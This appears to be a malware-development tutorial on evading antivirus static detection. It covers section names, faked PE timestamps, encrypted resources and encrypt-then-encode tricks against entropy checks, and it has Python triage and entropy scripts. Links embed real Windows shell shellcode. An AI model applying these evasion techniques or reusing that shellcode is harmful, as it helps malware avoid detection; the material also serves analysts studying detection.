Credit to Patryk for showing these techniques
Simple Shellcode Loader with minimal detection rate
Detecting Sandbox Environments
Anti-disassembly obfuscation using LLVM & Advanced String Obfuscation
Injecting COFF Object Files In Memory
Antimalware solutions can use three types of detection mechanisms:

- Signature-based detection: static inspection of file checksums (MD5, SHA1 etc.) and presence of known strings or byte sequences in the binary,
- Heuristic detection: (usually) static analysis of application behavior and identification of potentially malicious characteristics (e.g. use of specific functions which are usually associated with malware),
- Sandboxing: dynamic analysis of the program, which gets executed in a controlled environment (sandbox) where its actions are monitored.
Multiple techniques exist that evade the different detection mechanisms. For example:

- Polymorphic (or at least frequently recompiled) malware can defeat signature-based detection
- Obfuscation of the code flow can evade heuristics-based detection
- Conditional statements based on environmental checks can detect a sandbox and change behaviour to bypass it
- Encoding or encryption of sensitive information can help bypass signature-based detection as well as heuristic detection
While statically examining a malicious sample, malware analysts look at the PE file structure and contents. This data may reveal certain details about the application and help classify it as malware. We talked about imports before; now let's focus on other PE sections, embedded resources and timestamps.
The thing to note here is that section names should reflect a legitimate, compiled PE structure. For example, packers may rename sections to random character strings or even to obvious indicators of the packer software (`UPX0`, `UPX1` etc.). Adding a new section may also raise suspicions; it may be a better idea to store data in the existing resources section.

Also, a section's raw size (size on disk) should usually be almost equal to its virtual size (size in memory once the image is loaded). Small differences are common because of the different alignments used on disk and in RAM (typically file alignment 0x200 vs. section alignment 0x1000). For example, a `.text` section with a raw size of 0 and a virtual size of hundreds of KB most likely means the actual executable was packed and is written into that section only at runtime.
We can embed any data in the executable as a resource, for example an icon, a decoy document or a shellcode. However, everything will be visible with Resource Hacker or any similar tool. It is a good idea to embed malicious resources encrypted, or hidden with steganography, to make them harder to inspect.
The PE header contains a 4-byte `TimeDateStamp` field holding the Unix time (seconds since 1970-01-01 UTC) at which the image was linked. It can easily be changed (for example with a hex editor) to hide the actual compilation date. Keep in mind that an odd value alone is not proof of tampering: reproducible builds (MSVC `/Brepro`) deliberately store a hash of the image in this field instead of a time, so treat it as a hint rather than evidence.
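The checks above (section names, raw vs. virtual size, timestamp) together with the entropy check discussed next can be scripted. The following is an added example, not code from the original post. It parses the PE section table with `struct` only, so it runs offline without `pefile`, and everything it inspects is constructed: the two header-only PE images are built in the script, the packer prefixes other than `UPX` are an illustrative assumption, and the timestamps are arbitrary.

```python
import datetime
import hashlib
import math
import struct
from collections import Counter

# IMAGE_FILE_HEADER (20 bytes) and IMAGE_SECTION_HEADER (40 bytes) layouts
COFF_HDR = struct.Struct("<HHIIIHH")
SECTION_HDR = struct.Struct("<8sIIIIIIHHI")

# Section names normally emitted by MSVC/MinGW toolchains (illustrative, not exhaustive)
COMMON_SECTIONS = {b".text", b".rdata", b".data", b".pdata", b".xdata", b".rsrc",
                   b".reloc", b".idata", b".edata", b".bss", b".tls", b".CRT"}
# Name prefixes left behind by packers (UPX0/UPX1 as in the text; the others are assumed)
PACKER_PREFIXES = (b"UPX", b".aspack", b".MPRESS", b".vmp")


def shannon(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 .. 8.0)."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0


def parse_pe(data: bytes):
    """Return (TimeDateStamp, [section dicts]) from raw PE bytes; headers only."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    coff_off = e_lfanew + 4
    _, nsections, timestamp, _, _, opt_size, _ = COFF_HDR.unpack_from(data, coff_off)
    sec_off = coff_off + COFF_HDR.size + opt_size      # section table follows the optional header
    sections = []
    for i in range(nsections):
        name, vsize, _, rawsize, rawptr, _, _, _, _, _ = SECTION_HDR.unpack_from(
            data, sec_off + i * SECTION_HDR.size)
        sections.append({"name": name.rstrip(b"\0"), "vsize": vsize,
                         "rawsize": rawsize, "raw": data[rawptr:rawptr + rawsize]})
    return timestamp, sections


def triage(data: bytes, alignment: int = 0x1000) -> list:
    """Apply the checks from the text; returns a list of human-readable findings."""
    timestamp, sections = parse_pe(data)
    findings = []
    ts = datetime.datetime.fromtimestamp(timestamp, tz=datetime.timezone.utc)
    if timestamp == 0 or ts > datetime.datetime.now(datetime.timezone.utc):
        findings.append(f"TimeDateStamp {timestamp:#x} ({ts:%Y-%m-%d}) looks forged")
    for s in sections:
        name = s["name"].decode("latin-1")
        if s["name"].startswith(PACKER_PREFIXES):
            findings.append(f"{name}: packer-style section name")
        elif s["name"] not in COMMON_SECTIONS:
            findings.append(f"{name}: non-standard section name")
        # .bss legitimately has no data on disk; anything else with raw size 0 is filled at runtime
        if s["rawsize"] == 0 and s["vsize"] > 0 and s["name"] != b".bss":
            findings.append(f"{name}: raw size 0 but virtual size {s['vsize']:#x} (unpacked at runtime?)")
        elif abs(s["vsize"] - s["rawsize"]) > alignment:
            findings.append(f"{name}: raw size {s['rawsize']:#x} vs virtual size {s['vsize']:#x} "
                            "differ by more than one page")
        if s["raw"] and shannon(s["raw"]) > 7.0:
            findings.append(f"{name}: entropy {shannon(s['raw']):.2f}, likely encrypted or compressed")
    return findings


def build_pe(sections, timestamp: int) -> bytes:
    """Construct a minimal header-only PE for testing (no optional header; enough for the checks above)."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)              # e_lfanew: PE signature right after the DOS header
    coff = COFF_HDR.pack(0x8664, len(sections), timestamp, 0, 0, 0, 0x22)
    raw_ptr = 64 + 4 + COFF_HDR.size + SECTION_HDR.size * len(sections)
    hdrs, body = b"", b""
    for name, vsize, raw in sections:
        hdrs += SECTION_HDR.pack(name.ljust(8, b"\0"), vsize, 0x1000, len(raw),
                                 raw_ptr if raw else 0, 0, 0, 0, 0, 0x60000020)
        raw_ptr += len(raw)
        body += raw
    return bytes(dos) + b"PE\0\0" + coff + hdrs + body


def pseudo_random(n: int) -> bytes:
    """Deterministic high-entropy bytes standing in for an encrypted/compressed blob (constructed sample)."""
    return b"".join(hashlib.sha256(i.to_bytes(4, "little")).digest() for i in range(n // 32 + 1))[:n]


# Constructed samples: a plausibly linked image, and a UPX-style packed one with a zeroed timestamp
CLEAN_PE = build_pe([(b".text", 4000, b"\x48\x89\xe5\xc3" * 1024),
                     (b".rdata", 512, b"A" * 512)], 1_600_000_000)
PACKED_PE = build_pe([(b"UPX0", 0x20000, b""),
                      (b"UPX1", 4096, pseudo_random(4096))], 0)

if __name__ == "__main__":
    for label, blob in (("clean", CLEAN_PE), ("packed", PACKED_PE)):
        print(label, triage(blob) or ["no findings"])
```

On a real file, replace the constructed blobs with `open(path, "rb").read()`; the only difference is that real images carry an optional header, which `parse_pe` skips via `SizeOfOptionalHeader`.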
Entropy analysis can be used to easily find potentially encrypted content embedded in the executable. Encrypted data usually has relatively high entropy (close to 8 bits per byte). The same applies to compressed data.

We can use this simple Python script (be sure to install the `pefile` module) to calculate the entropy of the PE file sections:
```python
import sys
import math
import pefile


def entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 .. 8.0)."""
    if not data:
        return 0.0
    result = 0.0
    length = len(data)
    for x in range(256):
        p_x = data.count(x) / length      # bytes.count(int) counts occurrences of that byte value
        if p_x > 0:
            result -= p_x * math.log(p_x, 2)
    return result


pe = pefile.PE(sys.argv[1])
for s in pe.sections:
    # section names are NUL-padded to 8 bytes
    print(s.Name.decode("utf-8").rstrip("\x00") + "\t" + str(entropy(s.get_data())))
```
Let's start with the simple shellcode loader we developed before. Here is the entropy of its sections:
.text 4.616090501867742
.rdata 5.4577520758849944
.pdata 0.10191042566270775
.rsrc 4.7015032582517895
Application code in the `.text` section has entropy comparable to human language text. The shellcode lives in the `.rdata` section, which has slightly higher entropy.
Now let's embed a large blob of encrypted data, for example by adding a resource to the executable. As we can see below, the `.rsrc` section now most likely contains encrypted or compressed data. Note that an embedded image or any other file format that uses compression would look the same, so high entropy alone is a hint rather than proof.
.text 4.616090501867742
.rdata 5.458570681613711
.pdata 0.10191042566270775
.rsrc 7.95737230129355
To simply manipulate the entropy of a data block, we could use Base64 encoding. See the entropy values for [plain shellcode](https://gchq.github.io/CyberChef/#recipe=From_Hex('\\x')Entropy('Shannon scale')&input=XHhmY1x4NDhceDgzXHhlNFx4ZjBceGU4XHhjMFx4MDBceDAwXHgwMFx4NDFceDUxXHg0MVx4NTBceDUyXHg1MVx4NTZceDQ4XHgzMVx4ZDJceDY1XHg0OFx4OGJceDUyXHg2MFx4NDhceDhiXHg1Mlx4MThceDQ4XHg4Ylx4NTJceDIwXHg0OFx4OGJceDcyXHg1MFx4NDhceDBmXHhiN1x4NGFceDRhXHg0ZFx4MzFceGM5XHg0OFx4MzFceGMwXHhhY1x4M2NceDYxXHg3Y1x4MDJceDJjXHgyMFx4NDFceGMxXHhjOVx4MGRceDQxXHgwMVx4YzFceGUyXHhlZFx4NTJceDQxXHg1MVx4NDhceDhiXHg1Mlx4MjBceDhiXHg0Mlx4M2NceDQ4XHgwMVx4ZDBceDhiXHg4MFx4ODhceDAwXHgwMFx4MDBceDQ4XHg4NVx4YzBceDc0XHg2N1x4NDhceDAxXHhkMFx4NTBceDhiXHg0OFx4MThceDQ0XHg4Ylx4NDBceDIwXHg0OVx4MDFceGQwXHhlM1x4NTZceDQ4XHhmZlx4YzlceDQxXHg4Ylx4MzRceDg4XHg0OFx4MDFceGQ2XHg0ZFx4MzFceGM5XHg0OFx4MzFceGMwXHhhY1x4NDFceGMxXHhjOVx4MGRceDQxXHgwMVx4YzFceDM4XHhlMFx4NzVceGYxXHg0Y1x4MDNceDRjXHgyNFx4MDhceDQ1XHgzOVx4ZDFceDc1XHhkOFx4NThceDQ0XHg4Ylx4NDBceDI0XHg0OVx4MDFceGQwXHg2Nlx4NDFceDhiXHgwY1x4NDhceDQ0XHg4Ylx4NDBceDFjXHg0OVx4MDFceGQwXHg0MVx4OGJceDA0XHg4OFx4NDhceDAxXHhkMFx4NDFceDU4XHg0MVx4NThceDVlXHg1OVx4NWFceDQxXHg1OFx4NDFceDU5XHg0MVx4NWFceDQ4XHg4M1x4ZWNceDIwXHg0MVx4NTJceGZmXHhlMFx4NThceDQxXHg1OVx4NWFceDQ4XHg4Ylx4MTJceGU5XHg1N1x4ZmZceGZmXHhmZlx4NWRceDQ5XHhiZVx4NzdceDczXHgzMlx4NWZceDMzXHgzMlx4MDBceDAwXHg0MVx4NTZceDQ5XHg4OVx4ZTZceDQ4XHg4MVx4ZWNceGEwXHgwMVx4MDBceDAwXHg0OVx4ODlceGU1XHg0OVx4YmNceDAyXHgwMFx4MTFceDVjXHgwMFx4MDBceDAwXHgwMFx4NDFceDU0XHg0OVx4ODlceGU0XHg0Y1x4ODlceGYxXHg0MVx4YmFceDRjXHg3N1x4MjZceDA3XHhmZlx4ZDVceDRjXHg4OVx4ZWFceDY4XHgwMVx4MDFceDAwXHgwMFx4NTlceDQxXHhiYVx4MjlceDgwXHg2Ylx4MDBceGZmXHhkNVx4NTBceDUwXHg0ZFx4MzFceGM5XHg0ZFx4MzFceGMwXHg0OFx4ZmZceGMwXHg0OFx4ODlceGMyXHg0OFx4ZmZceGMwXHg0OFx4ODlceGMxXHg0MVx4YmFceGVhXHgwZlx4ZGZceGUwXHhmZlx4ZDVceDQ4XHg4OVx4YzdceDZhXHgxMFx4NDFceDU4XHg0Y1x4ODlceGUyXHg0OFx4ODlceGY5XHg0MVx4YmFceGMyXHhkYlx4MzdceDY3XHhmZlx4ZDVceDQ4XHgzMVx4ZDJceDQ4XHg4OVx4ZjlceDQxXHhiYVx4YjdceGU5XHgzOFx4ZmZceGZmXHhkNVx4NGRceDMxXHhjMFx4NDhceDMxXHhkMlx4NDhceDg5XHhmOVx4NDFceGJhXHg3NFx4ZWNceDNiXHhlMVx4ZmZceGQ1XHg0OFx4ODlceGY5XHg0OFx4ODlceGM3XHg0MVx4YmFceDc1XHg2ZVx4NGRceDYxXHhmZlx4ZDVceDQ4XHg4MVx4YzRceGEwXHgwMlx4MDBceDAwXHg0OVx4YjhceDYzXHg2ZFx4NjRceDAwXHgwMFx4MDBceDAwXHgwMFx4NDFceDUwXHg0MVx4NTBceDQ4XHg4OVx4ZTJceDU3XHg1N1x4NTdceDRkXHgzMVx4YzBceDZhXHgwZFx4NTlceDQxXHg1MFx4ZTJceGZjXHg2Nlx4YzdceDQ0XHgyNFx4NTRceDAxXHgwMVx4NDhceDhkXHg0NFx4MjRceDE4XHhjNlx4MDBceDY4XHg0OFx4ODlceGU2XHg1Nlx4NTBceDQxXHg1MFx4NDFceDUwXHg0MVx4NTBceDQ5XHhmZlx4YzBceDQxXHg1MFx4NDlceGZmXHhjOFx4NGRceDg5XHhjMVx4NGNceDg5XHhjMVx4NDFceGJhXHg3OVx4Y2NceDNmXHg4Nlx4ZmZceGQ1XHg0OFx4MzFceGQyXHg0OFx4ZmZceGNhXHg4Ylx4MGVceDQxXHhiYVx4MDhceDg3XHgxZFx4NjBceGZmXHhkNVx4YmJceGYwXHhiNVx4YTJceDU2XHg0MVx4YmFceGE2XHg5NVx4YmRceDlkXHhmZlx4ZDVceDQ4XHg4M1x4YzRceDI4XHgzY1x4MDZceDdjXHgwYVx4ODBceGZiXHhlMFx4NzVceDA1XHhiYlx4NDdceDEzXHg3Mlx4NmZceDZhXHgwMFx4NTlceDQxXHg4OVx4ZGFceGZmXHhkNQ), [AES-encrypted](https://gchq.github.io/CyberChef/#recipe=From_Hex('\\x')AES_Encrypt({'option':'Hex','string':'42138947829316abfa38addd8239088a'},{'option':'Hex','string':'983274bfbca8dde7938454875984aa7d'},'CBC','Raw','Raw')Entropy('Shannon scale')&input=XHhmY1x4NDhceDgzXHhlNFx4ZjBceGU4XHhjMFx4MDBceDAwXHgwMFx4NDFceDUxXHg0MVx4NTBceDUyXHg1MVx4NTZceDQ4XHgzMVx4ZDJceDY1XHg0OFx4OGJceDUyXHg2MFx4NDhceDhiXHg1Mlx4MThceDQ4XHg4Ylx4NTJceDIwXHg0OFx4OGJceDcyXHg1MFx4NDhceDBmXHhiN1x4NGFceDRhXHg0ZFx4MzFceGM5XHg0OFx4MzFceGMwXHhhY1x4M2NceDYxXHg3Y1x4MDJceDJjXHgyMFx4NDFceGMxXHhjOVx4MGRceDQxXHgwMVx4YzFceGUyXHhlZFx4NTJceDQxXHg1MVx4NDhceDhiXHg1Mlx4MjBceDhiXHg0Mlx4M2NceDQ4XHgwMVx4ZDBceDhiXHg4MFx4ODhceDAwXHgwMFx4MDBceDQ4XHg4NVx4YzBceDc0XHg2N1x4NDhceDAxXHhkMFx4NTBceDhiXHg0OFx4MThceDQ0XHg4Ylx4NDBceDIwXHg0OVx4MDFceGQwXHhlM1x4NTZceDQ4XHhmZlx4YzlceDQxXHg4Ylx4MzRceDg4XHg0OFx4MDFceGQ2XHg0ZFx4MzFceGM5XHg0OFx4MzFceGMwXHhhY1x4NDFceGMxXHhjOVx4MGRceDQxXHgwMVx4YzFceDM4XHhlMFx4NzVceGYxXHg0Y1x4MDNceDRjXHgyNFx4MDhceDQ1XHgzOVx4ZDFceDc1XHhkOFx4NThceDQ0XHg4Ylx4NDBceDI0XHg0OVx4MDFceGQwXHg2Nlx4NDFceDhiXHgwY1x4NDhceDQ0XHg4Ylx4NDBceDFjXHg0OVx4MDFceGQwXHg0MVx4OGJceDA0XHg4OFx4NDhceDAxXHhkMFx4NDFceDU4XHg0MVx4NThceDVlXHg1OVx4NWFceDQxXHg1OFx4NDFceDU5XHg0MVx4NWFceDQ4XHg4M1x4ZWNceDIwXHg0MVx4NTJceGZmXHhlMFx4NThceDQxXHg1OVx4NWFceDQ4XHg4Ylx4MTJceGU5XHg1N1x4ZmZceGZmXHhmZlx4NWRceDQ5XHhiZVx4NzdceDczXHgzMlx4NWZceDMzXHgzMlx4MDBceDAwXHg0MVx4NTZceDQ5XHg4OVx4ZTZceDQ4XHg4MVx4ZWNceGEwXHgwMVx4MDBceDAwXHg0OVx4ODlceGU1XHg0OVx4YmNceDAyXHgwMFx4MTFceDVjXHgwMFx4MDBceDAwXHgwMFx4NDFceDU0XHg0OVx4ODlceGU0XHg0Y1x4ODlceGYxXHg0MVx4YmFceDRjXHg3N1x4MjZceDA3XHhmZlx4ZDVceDRjXHg4OVx4ZWFceDY4XHgwMVx4MDFceDAwXHgwMFx4NTlceDQxXHhiYVx4MjlceDgwXHg2Ylx4MDBceGZmXHhkNVx4NTBceDUwXHg0ZFx4MzFceGM5XHg0ZFx4MzFceGMwXHg0OFx4ZmZceGMwXHg0OFx4ODlceGMyXHg0OFx4ZmZceGMwXHg0OFx4ODlceGMxXHg0MVx4YmFceGVhXHgwZlx4ZGZceGUwXHhmZlx4ZDVceDQ4XHg4OVx4YzdceDZhXHgxMFx4NDFceDU4XHg0Y1x4ODlceGUyXHg0OFx4ODlceGY5XHg0MVx4YmFceGMyXHhkYlx4MzdceDY3XHhmZlx4ZDVceDQ4XHgzMVx4ZDJceDQ4XHg4OVx4ZjlceDQxXHhiYVx4YjdceGU5XHgzOFx4ZmZceGZmXHhkNVx4NGRceDMxXHhjMFx4NDhceDMxXHhkMlx4NDhceDg5XHhmOVx4NDFceGJhXHg3NFx4ZWNceDNiXHhlMVx4ZmZceGQ1XHg0OFx4ODlceGY5XHg0OFx4ODlceGM3XHg0MVx4YmFceDc1XHg2ZVx4NGRceDYxXHhmZlx4ZDVceDQ4XHg4MVx4YzRceGEwXHgwMlx4MDBceDAwXHg0OVx4YjhceDYzXHg2ZFx4NjRceDAwXHgwMFx4MDBceDAwXHgwMFx4NDFceDUwXHg0MVx4NTBceDQ4XHg4OVx4ZTJceDU3XHg1N1x4NTdceDRkXHgzMVx4YzBceDZhXHgwZFx4NTlceDQxXHg1MFx4ZTJceGZjXHg2Nlx4YzdceDQ0XHgyNFx4NTRceDAxXHgwMVx4NDhceDhkXHg0NFx4MjRceDE4XHhjNlx4MDBceDY4XHg0OFx4ODlceGU2XHg1Nlx4NTBceDQxXHg1MFx4NDFceDUwXHg0MVx4NTBceDQ5XHhmZlx4YzBceDQxXHg1MFx4NDlceGZmXHhjOFx4NGRceDg5XHhjMVx4NGNceDg5XHhjMVx4NDFceGJhXHg3OVx4Y2NceDNmXHg4Nlx4ZmZceGQ1XHg0OFx4MzFceGQyXHg0OFx4ZmZceGNhXHg4Ylx4MGVceDQxXHhiYVx4MDhceDg3XHgxZFx4NjBceGZmXHhkNVx4YmJceGYwXHhiNVx4YTJceDU2XHg0MVx4YmFceGE2XHg5NVx4YmRceDlkXHhmZlx4ZDVceDQ4XHg4M1x4YzRceDI4XHgzY1x4MDZceDdjXHgwYVx4ODBceGZiXHhlMFx4NzVceDA1XHhiYlx4NDdceDEzXHg3Mlx4NmZceDZhXHgwMFx4NTlceDQxXHg4OVx4ZGFceGZmXHhkNQ), [GZIP-compressed](https://gchq.github.io/CyberChef/#recipe=From_Hex('\\x')Gzip('Dynamic Huffman Coding','','',false)Entropy('Shannon scale')&input=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) and [Base64-encoded](https://gchq.github.io/CyberChef/#recipe=From_Hex('\\x')To_Base64('A-Za-z0-9%2B/%3D')Entropy('Shannon scale')&input=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). So to defeat basic entropy analysis we could encrypt and then encode the data/payload, for example with a custom variation of Base64 (or Base62, or any other BaseN: the entropy of BaseN-encoded data is at most log2(N) bits per symbol, so about 6 for Base64 and about 5.95 for Base62, well below the close-to-8 bits of raw ciphertext). Note that the encoded blob is then larger (Base64 adds a third) and that the text-like alphabet itself is a characteristic a heuristic can look for, so the encoding hides the entropy, not the presence of the payload.
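The encrypt-then-encode pipeline from the last sentence, measured at every stage, as an added example that is not part of the original post. To keep it dependency-free, the "encryption" is a SHA-256 counter-mode keystream standing in for the AES step (it only needs to produce ciphertext-like bytes here; use a real cipher in practice), the payload is a constructed repetitive byte pattern rather than real shellcode, and the custom alphabet, the Base62 alphabet and the key are arbitrary choices.

```python
import base64
import hashlib
import math
import random
import string
from collections import Counter

STD_B64 = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"
BASE62 = string.digits + string.ascii_uppercase + string.ascii_lowercase
# A shuffled Base64 alphabet, the "custom variation" from the text; any fixed permutation works
_rng = random.Random(0xC0FFEE)
CUSTOM_B64 = "".join(_rng.sample(STD_B64, len(STD_B64)))

# Constructed stand-in for shellcode: repetitive x86-64-looking bytes plus an ASCII string (low entropy)
PAYLOAD = (b"\x48\x83\xec\x28\x48\x31\xc0\x48\x89\xc1\xff\xd0\xc3\x90\x90\x90" * 240
           + b"cmd.exe\x00" * 32)


def shannon(data) -> float:
    """Shannon entropy in bits per symbol; works on bytes or str."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0


def keystream_xor(data: bytes, key: bytes) -> bytes:
    """Stand-in for the AES step: XOR with a SHA-256 counter-mode keystream (assumed, not the post's method).
    Applying it twice with the same key restores the input."""
    stream = b"".join(hashlib.sha256(key + i.to_bytes(8, "little")).digest()
                      for i in range(len(data) // 32 + 1))
    return bytes(a ^ b for a, b in zip(data, stream))


def custom_base64(data: bytes, alphabet: str = CUSTOM_B64) -> str:
    """Standard Base64, then remap the 64 symbols; '=' padding is left alone."""
    return base64.b64encode(data).decode().translate(str.maketrans(STD_B64, alphabet))


def encode_base_n(data: bytes, alphabet: str) -> str:
    """Generic BaseN encoder via big-integer conversion; leading NUL bytes are kept as alphabet[0]."""
    n = len(alphabet)
    zeros = len(data) - len(data.lstrip(b"\0"))
    num = int.from_bytes(data, "big")
    digits = []
    while num:
        num, r = divmod(num, n)
        digits.append(alphabet[r])
    return alphabet[0] * zeros + "".join(reversed(digits))


def entropy_profile(payload: bytes, key: bytes = b"example-key") -> dict:
    """Entropy (bits per symbol) at each stage of the encrypt-then-encode pipeline."""
    ct = keystream_xor(payload, key)
    return {
        "plain": shannon(payload),
        "encrypted": shannon(ct),
        "base64": shannon(base64.b64encode(ct).decode()),
        "custom_base64": shannon(custom_base64(ct)),
        "base62": shannon(encode_base_n(ct, BASE62)),
    }


if __name__ == "__main__":
    for stage, bits in entropy_profile(PAYLOAD).items():
        print(f"{stage:14s} {bits:.3f} bits/symbol")
    print(f"log2(64) = {math.log2(64):.3f}, log2(62) = {math.log2(62):.3f}")
```

Remapping the alphabet does not change the entropy at all (it is a permutation of the same symbol counts), which is the point: the custom alphabet defeats a plain `b64decode` in an analyst's tooling, while the encoding step is what pulls the per-byte entropy down from roughly 8 to roughly log2(N).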